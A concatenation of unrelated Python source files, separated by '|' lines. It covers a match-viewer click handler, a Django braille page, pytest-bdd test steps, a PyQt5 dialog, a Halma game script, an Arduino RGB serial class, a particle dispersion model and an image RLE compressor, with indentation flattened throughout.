import vtool as vt
_mx1, _dist1 = vt.nearest_point(x, y, kpts1_m)
_mx2, _dist2 = vt.nearest_point(x - x2, y - y2, kpts2_m)
mx = _mx1 if _dist1 < _dist2 else _mx2
print('... clicked mx=%r' % mx)
self.select_ith_match(mx)
# elif viztype in ['warped', 'unwarped']:
# pass
# #hs_aid = ax.__dict__.get('_hs_aid', None)
# #hs_fx = ax.__dict__.get('_hs_fx', None)
# #if hs_aid is not None and viztype == 'unwarped':
# # ishow_chip(ibs, hs_aid, fx=hs_fx, fnum=pt.next_fnum())
# #elif hs_aid is not None and viztype == 'warped':
# # viz.show_keypoint_gradient_orientations(ibs, hs_aid,
# # hs_fx, fnum=pt.next_fnum())
# Click in match axes
# elif viztype == 'matches' and ctrl_down:
# # Ctrl-Click
# print('.. control click')
# return self.sv_view()
elif viztype.startswith('colorbar'):
# Hack to get a specific scoring feature
sortx = self.fs.argsort()
idx = np.clip(int(np.round(y * len(sortx))), 0, len(sortx) - 1)
mx = sortx[idx]
(fx1, fx2) = self.fm[mx]
(fx1, fx2) = self.fm[mx]
print('... selected score at rank idx=%r' % (idx,))
print('... selected score with fs=%r' % (self.fs[mx],))
print('... resolved to mx=%r' % mx)
print('... fx1, fx2 = %r, %r' % (fx1, fx2))
self.select_ith_match(mx)
else:
print('...Unknown viztype: %r' % viztype)
self.draw()
def on_click_outside(self, event):
if event.button != 1:
return
print('... out of axis')
# self.warp_homog = not self.warp_homog
self.mode = (self.mode + 1) % 3
# self.chipmatch_view()
self.show_page()
self.draw()
def get_popup_options(self):
def toggle_attr_item(attr, num_states=2):
value = getattr(self, attr)
type_ = type(value)
def toggle_attr():
new_value = (value + 1) % (num_states)
new_value = type_(new_value)
print('new_value(%s) = %r' % (attr, new_value))
setattr(self, attr, new_value)
self.show_page()
self.draw()
itemstr = 'Toggle %s=%r' % (attr, value)
return (itemstr, toggle_attr)
options = [
toggle_attr_item('warp_homog'),
toggle_attr_item('mode', 3),
]
return options
def show_keypoint_gradient_orientations(
ibs, rchip, kp, vec, fnum=None, pnum=None, config2_=None
):
# Draw the gradient vectors of a patch overlaying the keypoint
import wbia.plottoola as pt
if fnum is None:
fnum = pt.next_fnum()
# rchip = ibs.get_annot_chips(aid, config2_=config2_)
# kp = ibs.get_annot_kpts(aid, config2_=config2_)[fx]
# sift = ibs.get_annot_vecs(aid, config2_=config2_)[fx]
pt.draw_keypoint_gradient_orientations(
rchip, kp, sift=vec, mode='vec', fnum=fnum, pnum=pnum
)
# pt.set_title('Gradient orientation\n %s, fx=%d' % (get_aidstrs(aid), fx))
|
from django.shortcuts import render
from .braille_translators import alphaToBraille, brailleToAlpha
def braille_viewer(request):
text = "This is how they see the world."
text_braille = alphaToBraille.translate(text)
print(text_braille)
braille_text = brailleToAlpha.retranslate(text_braille)
print(braille_text)
num = len(text_braille)
return render(request, 'index.html',
{'range': range(num), 'text': braille_text, 'text_braille': text_braille})
# Powered by Braille-Translator(https://github.com/LazoCoder/Braille-Translator)
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import sys
from io import TextIOWrapper
from pathlib import Path
from model_analyzer.triton.model.model_config import ModelConfig
from pytest_bdd import then # pytype: disable=import-error
from pytest_bdd.parsers import parse # pytype: disable=import-error
from model_navigator.results import ResultsStore, State
from model_navigator.utils import Workspace
from model_navigator.utils.workspace import DEFAULT_WORKSPACE_PATH
from tests.utils.profile_results import get_profile_results
from tests.utils.triton_model_config import equal_model_configs_sets
@then(parse("the {command_name} subcommand results have {state} state and parameters matching:\n{parameters}"))
def the_command_results_should_have_given_state_and_parameters_matching(
run_context, command_name: str, state: str, parameters: str
):
"""the {command_name} command results have {state} state and parameters matching:\n{parameters}"""
workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
results_store = ResultsStore(workspace)
command_results = results_store.load(command_name.replace("-", "_"))
expected_state = State(state.lower())
results_states = [result.status.state for result in command_results]
assert all(
[actual_state == expected_state for actual_state in results_states]
), f"Results states: {results_states} while expecting: {expected_state}"
parameters = parameters.splitlines() if parameters else []
parameters = dict([tuple(parameter.split("=")) for parameter in parameters])
def _get_parameter(parameter_name, actual_value):
for part in parameter_name.split("."):
if hasattr(actual_value, part):
actual_value = getattr(actual_value, part)
elif actual_value is not None:
actual_value = actual_value.get(part, None)
return actual_value
for name, expected_value in parameters.items():
actual_values = [_get_parameter(name, actual_value) for actual_value in command_results]
actual_values = [
type(expected_value)(actual_value) if expected_value is not None else actual_value
for actual_value in actual_values
]
assert all(
[actual_value == expected_value for actual_value in actual_values]
), f"Actual values: {actual_values} while expecting {expected_value}"
@then(parse("the {command_name} subcommand results have {state} state"))
def the_command_results_should_have_given_state(run_context, command_name: str, state: str):
"""the {command_name} command results have {state} state"""
workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
results_store = ResultsStore(workspace)
command_results = results_store.load(command_name.replace("-", "_"))
expected_state = State(state.lower())
results_states = [result.status.state for result in command_results]
assert all(
[actual_state == expected_state for actual_state in results_states]
), f"Results states: {results_states} while expecting: {expected_state}"
@then(parse("the command should {state}"))
def the_command_should_have_given_state(run_context, state: str):
"""the command should {state} ."""
required_state = State(state.lower())
is_interactive = isinstance(sys.stdin, TextIOWrapper)
if not is_interactive:
for line in run_context.output.splitlines():
print(line)
if required_state == State.SUCCEEDED:
assert run_context.return_code == 0, f"the {run_context.cmd} should {state}"
else:
assert run_context.return_code != 0, f"the {run_context.cmd} should {state}"
@then(parse("the {model_name} model configs in latest profile checkpoint are\n{expected_configs_jsonlines}"))
def the_model_configs_in_latest_profile_checkpoint_are(run_context, model_name: str, expected_configs_jsonlines: str):
def _filter_out_not_swappable_parameters(config):
for name in ["name", "platform", "backend", "version_policy", "input", "output"]:
if name in config:
del config[name]
return config
expected_configs = [json.loads(line) for line in expected_configs_jsonlines.splitlines()]
workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
profiling_results = get_profile_results(workspace)
profiled_configs = [config.to_dict() for config, cmd_and_results in profiling_results[model_name].values()]
profiled_configs = [_filter_out_not_swappable_parameters(config) for config in profiled_configs]
if not equal_model_configs_sets(profiled_configs, expected_configs):
print("Profiled configs")
for profiled_config in profiled_configs:
print(json.dumps(profiled_config))
print("Expected configs")
for expected_config in expected_configs:
print(json.dumps(expected_config))
assert equal_model_configs_sets(profiled_configs, expected_configs)
@then(parse("the {model_name} model config in {model_repository} is equal to\n{expected_config_jsonline}"))
def the_model_configs_is_equal_to(run_context, model_name: str, model_repository: str, expected_config_jsonline: str):
model_dir_path = Path(run_context.cwd) / model_repository / model_name
expected_config = json.loads(expected_config_jsonline)
created_config = ModelConfig.create_from_file(model_dir_path.as_posix()).to_dict()
if expected_config != created_config:
print("Created config")
print(json.dumps(created_config))
print("Expected configs")
print(json.dumps(expected_config))
assert expected_config == created_config
@then(parse("the {model_name} model was profiled with {concurrency_levels} concurrency levels"))
def the_concurrency_in_latest_profile_checkpoint_are(run_context, model_name: str, concurrency_levels: str):
expected_concurrency = set(map(int, concurrency_levels.split(" ")))
workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
profiling_results = get_profile_results(workspace)
profiling_cmd_and_results = [cmd_and_results for config, cmd_and_results in profiling_results[model_name].values()]
perf_analyzers_args = [
measurement.perf_config()
for cmd_and_result_map in profiling_cmd_and_results
for cmd, measurement in cmd_and_result_map.items()
]
used_concurrency = {args["concurrency-range"] for args in perf_analyzers_args}
assert used_concurrency == expected_concurrency
@then(parse("the {pattern} pattern is present on command output"))
def substring_is_present_on_stderr(run_context, pattern: str):
fragments_found = re.findall(pattern, run_context.output, re.IGNORECASE)
if not fragments_found:
print(f"Searching for pattern: {pattern}")
print("Command output:")
for line in run_context.output.splitlines():
print(line)
assert fragments_found
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ocrProfileNameDialog.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ocrNameDialog(object):
def setupUi(self, ocrNameDialog):
ocrNameDialog.setObjectName("ocrNameDialog")
ocrNameDialog.resize(859, 203)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(ocrNameDialog.sizePolicy().hasHeightForWidth())
ocrNameDialog.setSizePolicy(sizePolicy)
ocrNameDialog.setMinimumSize(QtCore.QSize(0, 0))
ocrNameDialog.setMaximumSize(QtCore.QSize(16777215, 300))
self.gridLayout = QtWidgets.QGridLayout(ocrNameDialog)
self.gridLayout.setObjectName("gridLayout")
self.label = QtWidgets.QLabel(ocrNameDialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.profileNameEdit = QtWidgets.QLineEdit(ocrNameDialog)
self.profileNameEdit.setObjectName("profileNameEdit")
self.gridLayout.addWidget(self.profileNameEdit, 1, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(ocrNameDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 2, 0, 1, 1)
self.retranslateUi(ocrNameDialog)
self.buttonBox.accepted.connect(ocrNameDialog.accept)
self.buttonBox.rejected.connect(ocrNameDialog.reject)
QtCore.QMetaObject.connectSlotsByName(ocrNameDialog)
def retranslateUi(self, ocrNameDialog):
_translate = QtCore.QCoreApplication.translate
ocrNameDialog.setWindowTitle(_translate("ocrNameDialog", "OCR Profile Name "))
self.label.setText(_translate("ocrNameDialog", "<html><head/><body><p>It is important to clearly identify a saved OCR profile. A minimum is:</p><p>1) Initials of user (because it is possible to share your profiles with other users) +</p><p>2) Equipment chain: camera(PAL/NTSC) VTI frame-grabber</p><p>For example: RLA Watec-910-NTSC IOTA-VTI3 svid2usb2</p></body></html>"))
|
# -*- coding: utf-8 -*-
"""
Halma
@author: Mursito
"""
from halma_model import HalmaModel
model = HalmaModel()
model.awal(0,0)
p = model.getPapan()
print("PAPAN---------------------------")
print(p)
b0 = model.getPosisiBidak(1)
print("POSISI BIDAK---------------------------")
print(b0)
for b in b0:
print("BIDAK: ", model.getBidak(b[0], b[1]), b, "----------------")
g,l = model.bisaMain(b[0], b[1])
print("Geser : ", g)
print("Loncat: ", l)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import serial, time
class SyncError(Exception):
"""Synchronisation error"""
def __init__(self, msg=""):
self._msg = str(msg)
def __str__(self):
return msg
class SerialRGB(object):
"""Easy controlling of the RGB-LED / Arduino"""
def __init__(self, addr, baud=9600):
"""
Creating a new SerialRGB object.
addr -- The address of the serial port.
baud -- The baudrate (default: 9600)
"""
try:
self.ser = serial.Serial(addr, baud)
except:
raise IOError("Could not connect to Arduino via serial port.")
# Sync...
while self.ser.inWaiting() < 1:
self.ser.write("\x00")
time.sleep(.01)
if self.ser.read(1) != "1":
raise SyncError
def __del__(self):
self.close_connection()
def change_color(self, color):
"""
Send a colot to the Arduino.
color - 3-Tuple representing an RGB-Color (color components must be in range 0 - 255).
"""
r, g, b = color
self.ser.write(chr(r) + chr(g) + chr(b))
if self.ser.read(1) != "1":
raise SyncError
def close_connection(self):
"""Closes the connection to the Arduino."""
if self.ser is not None:
self.ser.close()
self.ser = None
|
"""
`Model` class for running the LPD model.
"""
import importlib
import math
import warnings
from copy import deepcopy as copy
import numpy as np
from . import lpd
from .utils import disable_numba
from .utils import enable_numba
from .utils import numbify
from .utils import unnumbify
__all__ = (
"Model",
"INPUT_PARAM_DEFAULTS",
"calc_MW_derived_params",
"compare_params",
)
INPUT_PARAM_DEFAULTS = {
#
# particle sources
"release_height": 1.05, # m; really should draw from a distribution of release heights for each particle!!
"source_positions": [(0, 0)], # point locs of the particle sources; must be iterable
"dNp_per_dt_per_source": 2, # should be int
#
# canopy
"canopy_height": 1.1, # m; h / h_c
"total_LAI": 2.0, # (total) leaf area index
"foliage_drag_coeff": 0.2, # C_d
#
# turbulence
"ustar": 0.25, # m; u_*; friction velocity above canopy (assuming const shear layer)
"von_Karman_constant": 0.4, # k
"Kolmogorov_C0": 5.5,
#
# run options
"dt": 0.25, # s; time step for the 1-O Newton FT scheme; this is what Pratt used
"t_tot": 100.0, # s; total time of the run
"dt_out": 1.0,
"continuous_release": True,
"use_numba": True,
"chemistry_on": False,
#
# chemistry
"fv_0": {}, # fv: floral volatiles. initial values (mol, ug, or somesuch) can be provided here.
"n_air_cm3": 2.62e19, # (dry) air number density (molec cm^-3)
"oxidants_ppbv": {"O3": 40.0, "OH": 1.0e-4, "NO3": 1.0e-5},
#
# Massman and Weil (MW) canopy wind model parameters (could be dict)
"MW_c1": 0.28, # c's for above-canopy wind profile
"MW_c2": 0.37,
"MW_c3": 15.1,
"MW_gam1": 2.40, # gam_i = sig_i/u_star (velocity std's above canopy, in sfc layer)
"MW_gam2": 1.90,
"MW_gam3": 1.25,
"MW_alpha": 0.05, # parameter that controls in-canopy sigma_w and sigma_u
"MW_A2": 0.6 # appears to be unused, but is part of their model
# only alpha and A_1 are empirical constants (MW p. 89)
}
"""
Input parameter defaults.
"""
# could do more dict nesting like in pyAPES...
# TODO: opposite of this -- calculate above MW params from normal wind params
def calc_MW_derived_params(p):
r"""Calculate Massman and Weil (1999) parameters
from the base wind profile parameters
$c_i$, $\gamma_i$, $\alpha$ ($i = 1\colon3$)
and other model input parameters.
References
----------
* [Massman and Weil (1999)](https://doi.org/10.1023/A:1001810204560) [MW]
"""
cd = p["foliage_drag_coeff"]
ustar = p["ustar"]
LAI = p["total_LAI"]
h = p["canopy_height"]
kconstant = p["von_Karman_constant"]
c1 = p["MW_c1"]
c2 = p["MW_c2"]
c3 = p["MW_c3"]
gam1 = p["MW_gam1"]
gam2 = p["MW_gam2"]
gam3 = p["MW_gam3"]
alpha = p["MW_alpha"]
# derived params
nu1 = (gam1 ** 2 + gam2 ** 2 + gam3 ** 2) ** (-0.5) # MW p. 86
nu3 = (gam1 ** 2 + gam2 ** 2 + gam3 ** 2) ** (1.5)
nu2 = nu3 / 6 - gam3 ** 2 / (2 * nu1)
# Lam2 = 7/(3*alpha**2*nu1*nu3) + [1/3 - gam3**2*nu1**2]/(3*alpha**2*nu1*nu2) # the first Lambda^2
Lam2 = 3 * nu1 ** 2 / alpha ** 2 # the simplified Lambda^2 expr; MW p. 87
Lam = math.sqrt(Lam2)
uh = ustar / (c1 - c2 * math.exp(-c3 * cd * LAI)) # u(h); MW Eq. 5
n = cd * LAI / (2 * ustar ** 2 / uh ** 2) # MW Eq. 4, definitely here "n" not "nu"
B1 = -(9 * ustar / uh) / (2 * alpha * nu1 * (9 / 4 - Lam ** 2 * ustar ** 4 / uh ** 4))
d = h * (1 - (1 / (2 * n)) * (1 - math.exp(-2 * n))) # displacement height
z0 = (h - d) * math.exp(-kconstant * uh / ustar) # roughness length
# Calculate dissipation at canopy top to choose matching approach (Massman and Weil)
epsilon_ah = (ustar ** 3) / (kconstant * (h - d))
sig_eh = ustar * (nu3) ** (1 / 3) # not used elsewhere
epsilon_ch = sig_eh ** 3 * (cd * LAI / h) / (nu3 * alpha)
if epsilon_ah >= epsilon_ch:
epflag = True
else: # eps_a(h) < eps_c(h) => usually indicates a relatively dense canopy
epflag = False
r = {
"MW_nu1": nu1,
"MW_nu2": nu2,
"MW_nu3": nu3,
"MW_Lam": Lam,
"MW_n": n, # should be eta? (think not)
"MW_B1": B1,
"U_h": uh, # mean wind speed at canopy height U(h)
"displacement_height": d,
"roughness_length": z0,
"MW_epsilon_a_h": epsilon_ah, # above-canopy TKE dissipation rate at h
"MW_epsilon_c_h": epsilon_ch, # in-canopy " "
"MW_epsilon_ah_gt_ch": epflag, # name needs to be more descriptive
}
return r
def compare_params(p, p0=None, input_params_only=False, print_message=True):
"""Compare parameters dict `p` to reference `p0`.
`p0` is assumed to be the default parameters dict if not provided.
Use `input_params_only=True` to only see those differences in the message.
"""
if p0 is None:
p0 = Model().p
p0_name = "default"
else:
p0_name = "reference"
same = True
if any(p[k] != p0[k] for k in p0):
same = False
if input_params_only:
p0 = {k: p0[k] for k in p0 if k in INPUT_PARAM_DEFAULTS}
if print_message:
t = f"parameter: {p0_name} --> current"
print(t)
print("-" * len(t))
for k, v0 in sorted(p0.items(), key=lambda x: x[0].lower()): # don't separate uppercase
v = p[k]
if v0 != v:
if print_message:
print(f"'{k}': {v0} --> {v}")
if same:
if print_message:
print(f"all params same as {p0_name}")
return same
class Model:
"""The LPD model."""
# class variables (as opposed to instance)
_p_user_input_default = INPUT_PARAM_DEFAULTS
_p_default_MW = calc_MW_derived_params(_p_user_input_default)
_p_input_default = {**_p_user_input_default, **_p_default_MW}
def __init__(self, p=None):
"""
Parameters
----------
p : dict
User-supplied input parameters (to update the defaults (`INPUT_PARAM_DEFAULTS`)).
`Model.update_p` can also be used to update parameters
after creating the `Model` instance.
"""
self.p = copy(Model._p_input_default) # start with defaults
"""Model parameters dict. This includes both *input* and *derived*
parameters and so should not be modified directly
(instead use `Model.update_p`).
"""
if p is None:
p = {}
self.update_p(**p) # calculate derived params
# checks (could move to separate `check_p` method or to `update_p`)
assert (
self.p["release_height"] <= self.p["canopy_height"]
), "particles must be released within canopy"
assert (
np.modf(self.p["dt_out"] / self.p["dt"])[0] == 0
), "output interval must be a multiple of dt"
self._init_state()
self._init_hist()
def update_p(self, **kwargs):
"""Use `**kwargs` (allowed user input parameters only) to check/update all model parameters
(in place).
"""
allowed_keys = self._p_user_input_default.keys()
for k, v in kwargs.items():
if k not in allowed_keys:
msg = f"key '{k}' is not in the default parameter list. ignoring it."
warnings.warn(msg)
else:
if isinstance(v, dict):
self.p[k].update(v)
else:
self.p[k] = v
# calculated parameters (probably should be in setter methods or something to prevent inconsistencies)
# i.e., user changing them without using `update_p`
self.p["N_sources"] = len(self.p["source_positions"])
# calculate oxidant concentrations from ppbv values and air number density
n_a = self.p["n_air_cm3"]
conc_ox = {}
for ox_name, ox_ppbv in self.p["oxidants_ppbv"].items():
conc_ox[ox_name] = n_a * ox_ppbv * 1e-9
self.p.update({"conc_oxidants": conc_ox})
# calculate number of time steps: N_t from t_tot
t_tot = self.p["t_tot"]
dt = self.p["dt"]
N_t = math.floor(t_tot / dt) # number of time steps
if abs(N_t - t_tot / dt) > 0.01:
msg = f"N was rounded down from {t_tot/dt:.4f} to {N_t}"
warnings.warn(msg)
self.p["N_t"] = N_t # TODO: consistentify style between N_p and N_t
# calculate total run number of particles: Np_tot
dNp_dt_ds = self.p["dNp_per_dt_per_source"]
N_s = self.p["N_sources"]
if self.p["continuous_release"]:
Np_tot = N_t * dNp_dt_ds * N_s
Np_tot_per_source = int(Np_tot / N_s)
else:
Np_tot = dNp_dt_ds * N_s
Np_tot_per_source = dNp_dt_ds
self.p["Np_tot"] = Np_tot
self.p["Np_tot_per_source"] = Np_tot_per_source
# some variables change the lengths of the state and hist arrays
if any(
k in kwargs
for k in ["t_tot", "dNp_per_dt_per_source", "N_sources", "continuous_release"]
):
self._init_state()
self._init_hist()
# some variables affect the derived MW variables
#
# these are the non-model-parameter inputs:
MW_inputs = [
"foliage_drag_coeff",
"ustar",
"total_LAI",
"canopy_height",
"von_Karman_constant",
]
# check for these and also the MW model parameters
if any(k in kwargs for k in MW_inputs) or any(k[:2] == "MW" for k in kwargs):
self.p.update(calc_MW_derived_params(self.p))
return self
# TODO: could change self.p to self._p, but have self.p return a view,
# but give error if user tries to set items
# TODO: init conc at this time too?
def _init_state(self):
Np_tot = self.p["Np_tot"]
# also could do as 3-D? (x,y,z coords)
# particle positions
xp = np.empty((Np_tot,))
yp = np.empty((Np_tot,))
zp = np.empty((Np_tot,))
# local wind speed (perturbation?) at particle positions
up = np.zeros((Np_tot,)) # should initial u be = horiz wind speed? or + a perturbation?
vp = np.zeros((Np_tot,))
wp = np.zeros((Np_tot,))
# seems ideal to generate sources and initial pos for each before going into time loop
# can't be generator because we go over them multiple times
# but could have a generator that generatoes that sources for each time step?
N_sources = self.p["N_sources"]
Np_tot_per_source = self.p["Np_tot_per_source"]
release_height = self.p["release_height"]
source_positions = self.p["source_positions"]
for isource in range(N_sources):
ib = isource * Np_tot_per_source
ie = (isource + 1) * Np_tot_per_source
xp[ib:ie] = source_positions[isource][0]
yp[ib:ie] = source_positions[isource][1]
zp[ib:ie] = release_height
# rearrange by time (instead of by source)
for p_ in (xp, yp, zp):
groups = []
for isource in range(N_sources):
ib = isource * Np_tot_per_source
ie = (isource + 1) * Np_tot_per_source
groups.append(p_[ib:ie])
p_[:] = np.column_stack(groups).flatten()
# assuming sources same strength everywhere for now
self.state = {
# 'k': 0,
# 't': 0,
# 'Np_k': 0,
"xp": xp,
"yp": yp,
"zp": zp,
"up": up,
"vp": vp,
"wp": wp,
}
def _init_hist(self):
if self.p["continuous_release"]:
hist = False
else:
# set up hist if dt_out
# should use xarray for this (and for other stuff too; like sympl)
if self.p["dt_out"] <= 0:
raise ValueError("dt_out must be pos. to use single-release mode")
# TODO: should be ok to do continuous_release without hist if want
t_tot = self.p["t_tot"]
dt_out = self.p["dt_out"]
Np_tot = self.p["Np_tot"]
hist = dict()
N_t_hist = int(t_tot / dt_out) + 1
hist["pos"] = np.empty((Np_tot, N_t_hist, 3)) # particle, x, y, z
hist["ws"] = np.empty((Np_tot, N_t_hist, 3))
# could use list instead of particle dim
# to allow for those with different record lengths
xp = self.state["xp"]
yp = self.state["yp"]
zp = self.state["zp"]
up = self.state["up"]
vp = self.state["vp"]
wp = self.state["wp"]
hist["pos"][:, 0, :] = np.column_stack((xp, yp, zp)) # initial positions
hist["ws"][:, 0, :] = np.column_stack((up, vp, wp))
self.hist = hist
def run(self):
"""Run the LPD model, integrating the particles using
`blpd.lpd.integrate_particles_one_timestep`.
"""
import datetime
# TODO: change to `time.perf_counter` for this?
self._clock_time_run_start = datetime.datetime.now()
Np_k = 0 # initially tracking 0 particles
# Np_tot = self.p['Np_tot']
dt = self.p["dt"]
dt_out = self.p["dt_out"]
N_t = self.p["N_t"] # number of time steps
# t_tot = self.p['t_tot']
dNp_dt_ds = self.p["dNp_per_dt_per_source"]
N_s = self.p["N_sources"]
# outer loop could be particles instead of time. might make some parallelization easier
# init of hist and state could go here
if self.p["use_numba"]:
enable_numba() # ensure numba compilation is not disabled
# > prepare p for numba
p_for_nb = {k: v for k, v in self.p.items() if not isinstance(v, (str, list, dict))}
# p_for_nb = {k: v for k, v in self.p.items() if isinstance(v, (int, float, np.ndarray))}
# p_nb = numbify(p_for_nb)
p_nb = numbify(p_for_nb, zerod_only=True) # only floats/ints
# > prepare state for numba
# leaving out t and k for now, pass as arguments instead
# state_for_nb = {k: v for k, v in self.state.items() if k in ('xp', 'yp', 'zp', 'up', 'vp', 'wp')}
state_for_nb = self.state
state_nb = numbify(state_for_nb)
# for debug
self.p_nb = p_nb
self.state_nb = state_nb
state_run = state_nb
p_run = p_nb
else: # model is set not to use numba (for checking the performance advantage of using numba)
disable_numba() # disable numba compilation
state_run = self.state
p_run = self.p
# changing numba config in lpd redefines the njit decorated functions
# but that isn't recognized right away unless we do this re-import
# reloading numba in lpd doesn't seem to work
# - at least not the first time trying to run after changing use_numba True->False
importlib.reload(lpd)
# print(state_run['xp'].shape)
for k in range(1, N_t + 1):
if self.p["continuous_release"]:
Np_k += dNp_dt_ds * N_s
else: # only release at k=1 (at k=0 the particles are inside their release point)
if k == 1:
Np_k += dNp_dt_ds * N_s
else:
pass
t = k * dt # current (elapsed) time
if self.p["use_numba"]:
state_run.update(numbify({"k": k, "t": t, "Np_k": Np_k}))
else:
state_run.update({"k": [k], "t": [t], "Np_k": [Np_k]})
# print(state_run['xp'].shape)
# pass numba-ified dicts here
lpd.integrate_particles_one_timestep(state_run, p_run)
# integrate_particles_one_timestep(state_run, p_run)
# TODO: option to save avg / other stats in addition to instantaneous? or specify avg vs instant?
if self.hist is not False:
if t % dt_out == 0:
o = int(t // dt_out) # note that `int()` floors anyway
xp = state_run["xp"]
yp = state_run["yp"]
zp = state_run["zp"]
up = state_run["up"]
vp = state_run["vp"]
wp = state_run["wp"]
self.hist["pos"][:, o, :] = np.column_stack((xp, yp, zp))
self.hist["ws"][:, o, :] = np.column_stack((up, vp, wp))
if self.p["use_numba"]:
self.state = unnumbify(state_run)
else:
self.state = state_run
self._clock_time_run_end = datetime.datetime.now()
# self._maybe_run_chem()
return self
# def _maybe_run_chem(self):
# # note: adds conc dataset to self.state
# # this check/correction logic could be somewhere else
# if self.p['chemistry_on']:
# if not self.p['continuous_release']:
# warnings.warn(
# 'chemistry is calculated only for the continuous release option (`continuous_release=True`). not calculating chemistry',
# stacklevel=2,
# )
# self.p['chemistry_on'] = False
# if self.p["chemistry_on"]:
# conc = chem_calc_options["fixed_oxidants"](self.to_xarray())
# else:
# conc = False
# self.state.update({
# 'conc': conc
# })
# # maybe should instead remove 'conc' from state if not doing chem
def to_xarray(self):
"""Create and return an `xr.Dataset` of the LPD run."""
# TODO: smoothing/skipping options to reduce storage needed?
import json
import xarray as xr
ip_coord_tup = (
"ip",
np.arange(self.p["Np_tot"]),
{"long_name": "Lagrangian particle index"},
)
if self.hist: # continuous release run
t = np.arange(0, self.p["t_tot"] + self.p["dt_out"], self.p["dt_out"])
# ^ note can use `pd.to_timedelta(t, unit="s")`
dims = ("ip", "t")
coords = {
"ip": ip_coord_tup,
"t": ("t", t, {"long_name": "Simulation elapsed time", "units": "s"}),
}
x = self.hist["pos"][..., 0]
y = self.hist["pos"][..., 1]
z = self.hist["pos"][..., 2]
u = self.hist["ws"][..., 0]
v = self.hist["ws"][..., 1]
w = self.hist["ws"][..., 2]
else: # no hist, only current state
dims = ("ip",)
coords = {"ip": ip_coord_tup}
x = self.state["xp"]
y = self.state["yp"]
z = self.state["zp"]
u = self.state["up"]
v = self.state["vp"]
w = self.state["wp"]
data_vars = {
"x": (dims, x, {"long_name": "$x$", "units": "m"}),
"y": (dims, y, {"long_name": "$y$", "units": "m"}),
"z": (dims, z, {"long_name": "$z$", "units": "m"}),
"u": (dims, u, {"long_name": "$u$", "units": "m s$^{-1}$"}),
"v": (dims, v, {"long_name": "$v$", "units": "m s$^{-1}$"}),
"w": (dims, w, {"long_name": "$w$", "units": "m s$^{-1}$"}),
}
# Serialize model parameters in JSON to allow saving in netCDF and loading later
attrs = {
"run_completed": self._clock_time_run_end,
"run_runtime": self._clock_time_run_end - self._clock_time_run_start,
# TODO: package version once the packaging is better...
"p_json": json.dumps(self.p),
}
ds = xr.Dataset(
coords=coords,
data_vars=data_vars,
attrs=attrs,
)
# TODO: Add extra useful coordinates: t_out for non-hist and t as Timedelta for hist
return ds
def to_xr(self):
"""Alias of `Model.to_xarray`."""
def plot(self, **kwargs):
"""Make a plot of the results (type based on run type).
`**kwargs` are passed through to the relevant plotting function.
* single release: `blpd.plot.trajectories`
* continuous release: `blpd.plot.final_pos_scatter`
"""
# first check if model has been run
p = self.p
state = self.state
hist = self.hist
from . import plot
if np.all(state["up"] == 0): # model probably hasn't been run
pass # silently do nothing for now
else:
if (p["continuous_release"] is False) and hist:
plot.trajectories(self.to_xarray(), **kwargs)
else:
plot.final_pos_scatter(self.to_xarray(), **kwargs)
|
from PIL import Image
from colormap import *
import os
def image_read(img_s):
img = Image.open(img_s)
largeur,hauteur = img.size
l=[]
cou=largeur*hauteur
for y in range(hauteur):
for x in range(largeur):
r,v,b = img.getpixel((x,y))
rgb565 = (((r & 248)<<8)+((v & 252)<<3)+((b & 248)>>3))
#print(hex(rgb565))
#color=rgb2hex(r,v,b)
color=hex(rgb565)
color = color[2:]
while len(color)!=4:
color="0"+color
if len(color)!=4:print('error')
if color == "0000" : color = "0020"
l.append(color)
return l
def RLE_compresse(l):
lf=[]
i=0
c=1
p=0
while i <= len(l)-1:
try:
while l[i]==l[i+1] :
if l[i]==l[i+1]==l[i+2] or p==1:
p=1
i+=1
c+=1
col=l[i]
if c==255 : break
else:break
p=0
except:pass
if c!=1 :
lf.append("0000")
ar = hex(c)
ar = ar[2:]
while len(ar)!=2:
ar="0"+ar
lf.append(ar)
lf.append(col)
c=1
i+=1
else :
lf.append(l[i])
i+=1
return lf
def main():
dat=[]
c=0
onlyfiles = next(os.walk("d_img/"))[2]
print(len(onlyfiles)," files\n")
for i in range(len(onlyfiles)):
select_img="d_img/"+str(i)+".png"
try :
msd5=str(c)+".png"
print(msd5)
imnc=image_read(select_img)
imc=RLE_compresse(imnc)
dat.append(imc)
c=c+1
except :
print("error img ",i)
c=c+1
pass
#dat_f=dat_f+"{B}"
#c=c+1
return dat,c
def ar2bin(d,q):
mes=""
for i in range(len(d)):
fl=str(i)+".bin"
file = open("img/"+fl,"wb")
for j in range(len(d[i])):
hex_string = d[i][j]
#print(hex_string)
try :
a=bytearray.fromhex(hex_string)
except:
#print(hex_string)
pass
if j==0:
if q==0:
zer=bytearray.fromhex("49424d505f70000000")
elif q==1 : zer=bytearray.fromhex("49424d505f70000001")
file.write(zer)
file.write(a)
file.close()
file.close()
return None
def ar2bin_v(d,q,v):
mes=""
nnn=0
